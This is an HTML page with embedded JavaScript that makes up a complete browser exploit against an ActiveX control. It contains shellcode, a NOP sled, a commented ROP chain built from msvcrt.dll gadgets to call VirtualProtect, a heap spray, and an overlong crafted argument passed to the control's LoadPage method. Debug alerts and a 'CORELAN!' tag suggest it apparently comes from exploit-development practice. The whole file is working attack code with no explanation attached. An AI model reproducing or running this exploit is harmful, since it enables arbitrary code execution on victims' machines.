<html>
<body>
<object classid='clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2' id='target' /></object>
<script>
	var tag = unescape('%u4F43%u4552'); // CORE
	    tag += unescape('%u414C%u214E'); // LAN!
	var nops = unescape("%u9090%u9090");
  var shellcode="\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6577\u7473\u6668\u6961\u8b6c\u53c4\u5050\uff53\ufc57\uff53\uf857";
alert("Spray")
	var rop_gadgets = unescape(
		"%u385e%u77c2" + // 0x77c2385e : ,# POP EBP # RETN [msvcrt.dll] 
		"%u385e%u77c2" + // 0x77c2385e : ,# skip 4 bytes [msvcrt.dll]
		"%u61c1%u77c1" + // 0x77c161c1 : ,# POP EBX # RETN [msvcrt.dll] 
		"%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
		"%ue18c%u77c1" + // 0x77c1e18c : ,# POP EDX # RETN [msvcrt.dll] 
		"%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx
		"%ud998%u77bf" + // 0x77bfd998 : ,# POP ECX # RETN [msvcrt.dll] 
		"%uf319%u77c2" + // 0x77c2f319 : ,# &Writable location [msvcrt.dll]
		"%u7ae8%u77c1" + // 0x77c17ae8 : ,# POP EDI # RETN [msvcrt.dll] 
		"%u6101%u77c1" + // 0x77c16101 : ,# RETN (ROP NOP) [msvcrt.dll]
		"%u3b86%u77bf" + // 0x77bf3b86 : ,# POP ESI # RETN [msvcrt.dll] 
		"%uaacc%u77bf" + // 0x77bfaacc : ,# JMP [EAX] [msvcrt.dll]
		"%u4de1%u77c0" + // 0x77c04de1 : ,# POP EAX # RETN [msvcrt.dll] 
		"%u1131%u77be" + // 0x77be1120 : ,# ptr to &VirtualProtect() [IAT msvcrt.dll]
		"%u67f0%u77c2" + // 0x77c267f0 : ,# PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] 
		"%u1025%u77c2" + // 0x77c21025 : ,# ptr to 'push esp # ret ' [msvcrt.dll]
		"");
alert("Spray 0")
  	while (nops.length < 0x1000) //100000
		nops += nops;
  	var before=nops.substring(0,0x5F6);
	alert("Spray 1")
	var end=before+rop_gadgets+shellcode+nops.substring(0, 0x800 - before.length-rop_gadgets.length- shellcode.length);
	while(end.length<0x40000)
	{
		end+=end;
	}

	alert("Spray 2")
  	var memory = new Array();
  	for (var i=0;i<200;i++) 
	memory[i] = end.substring(2,end.length-0x21);
	alert("Spray done")

var str = '';
while(str.length <256) str += '\x0c\x0c\x0c\x0c';
str = str + '\x1B\x71\x38\x63';//pop eax  jscript.dll
str += '\x0c\x0c\x0c\x0c';
str += '\x0c\x0c\x0c\x0c';
str = str + '\x0c\x0c\x0c\x0c';
str = str + '\x2d\x30\x3b\x63';//xchg '\xD4\xDE\xC1\x77'++'\xD5\x5E\xBE\x77' 
target.LoadPage(str, 1, 1, 1);
</script>
</body>
</html>
